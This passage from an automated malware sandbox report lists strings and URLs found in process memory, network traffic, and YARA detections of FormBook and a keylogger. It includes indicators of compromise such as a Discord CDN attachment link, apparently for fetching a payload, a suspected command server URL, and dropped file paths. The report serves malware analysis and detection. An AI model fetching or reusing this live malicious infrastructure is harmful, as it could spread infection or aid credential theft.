Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp, msdt.exe, 00000006.00000002.605314141.0000000000510000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpW
Source: msdt.exe, 00000006.00000002.605314141.0000000000510000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpp
Source: msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpK
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpacLMEMp
Source: msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp%
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp5
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: msdt.exe, 00000006.00000002.610514079.0000000004F59000.00000004.00000001.sdmp	String found in binary or memory: http://www.systemmigrationservices.com
Source: msdt.exe, 00000006.00000002.610514079.0000000004F59000.00000004.00000001.sdmp	String found in binary or memory: http://www.systemmigrationservices.com/gwg/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.disc8
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discorda
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attac
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/74
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/77975373507710160
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336$
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/78173523363220
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868/Hmptxxx
Source: Hmptdrv.exe, 00000005.00000002.428937073.00000000007FF000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868/HmptxxxP
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336322068688
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868d
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/7817352336P
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/779753735077101603/78L
Source: Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/7797537350771X
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp, msdt.exe, 00000006.00000003.412844760.000000000053C000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1CQ
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/
Source: 11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/2
Source: 11-27.exe, 00000000.00000002.414643524.00000000008AA000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp	String found in binary or memory: https://discordapp.com/
Source: Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://discordapp.com/x
Source: Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: msdt.exe, 00000006.00000003.407010469.000000000053C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/b67LMEMh
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: Hmptdrv.exe PID: 6152, type: MEMORY

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Detected FormBook malware

Source: C:\Windows\SysWOW64\msdt.exe	Dropped file: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	Dropped file: C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

